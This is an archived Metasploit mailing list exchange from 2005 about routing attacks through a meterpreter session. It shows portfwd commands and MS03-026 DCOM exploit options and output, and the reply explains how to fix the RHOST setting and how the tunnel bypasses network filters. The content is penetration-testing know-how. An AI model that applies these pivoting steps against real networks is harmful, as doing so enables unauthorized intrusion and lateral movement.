Metasploit mailing list archives

use of meterpreter

From: mmiller at hick.org (mmiller at hick.org)
Date: Thu, 14 Apr 2005 02:34:57 -0500

On Thu, Apr 14, 2005 at 09:10:12AM +0200, Thomas Werth wrote:

1. Exploitet "proxy victim" with metasploit's meterpreter payload.
2. In meterpreter "shell" i'm adding some portfwd's like this :
- portfwd -a -l 9500 -h 'nextTargetIP' -p 135
- portfwd -a -l 4444 -h 'nextTargetIP' -p 4444 -P //-P is just another
test in hope it will work this time ...
3. now i'm using msrpc exploit with win32_bind payload
Setting Options to

msf msrpc_dcom_ms03_026(win32_bind) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default        Description
  --------    ------    -----------    ------------------
  required    RHOST     'ProxyHost'    The target address
  required    RPORT     9500           The target port

  Payload:    Name        Default    Description
  --------    --------    -------
------------------------------------------
  required    EXITFUNC    thread     Exit technique: "process",
"thread", "seh"
  required    LPORT       4444       Listening port for bind shell

  Target: Windows NT SP6/2K/XP/2K3 ALL

4. now launching exploit

msf msrpc_dcom_ms03_026(win32_bind) > exploit

5. that's where it hangs :

[*] Starting Bind Handler.
[*] Got connection from 'HOST_I_USE_FOR_ATTACK':32773 <-> 'PROXY_HOST':4444

6. Waited long enough, killed connetion with strg-C

Caught interrupt, exit connection? [y/n] y
[*] Exiting Bind Handler.

What am i doing wrong, or isn't it possible to use portfwd so attacks
can be redirected through a proxy ?


The thing to note is that connections are proxied from your local
machine through the meterpreter connection to the target that you are
trying to reach.  In the example you provided above, it appears that you
are expecting the port forwards to be listening on the proxy host that
you initially exploited.  Instead, you should expect the port forward
listeners to be listening on your local machine.  All of the steps you
performed were correct, except instead of using 'ProxyHost' you should
use 127.0.0.1 for RHOST.  I imagine the reason the bind handler got a
connection is because you exploited the 'ProxyHost' with win32_bind
(using port 4444).

The reason connections are proxied starting from your local machine is
because this allows you to transparently bypass any sort of inbound or
outbound filters (since it tunnels through the already established
meterpreter communication channel).

Hope that helps!

Current thread:

use of meterpreter Thomas Werth (Apr 14)
- use of meterpreter mmiller at hick.org (Apr 14)
  - use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
    - use of meterpreter (copy for the list ) mmiller at hick.org (Apr 14)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
    - use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 15)
    - use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
    - use of meterpreter (copy for the list ) mmiller at hick.org (Apr 18)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 18)

(Thread continues...)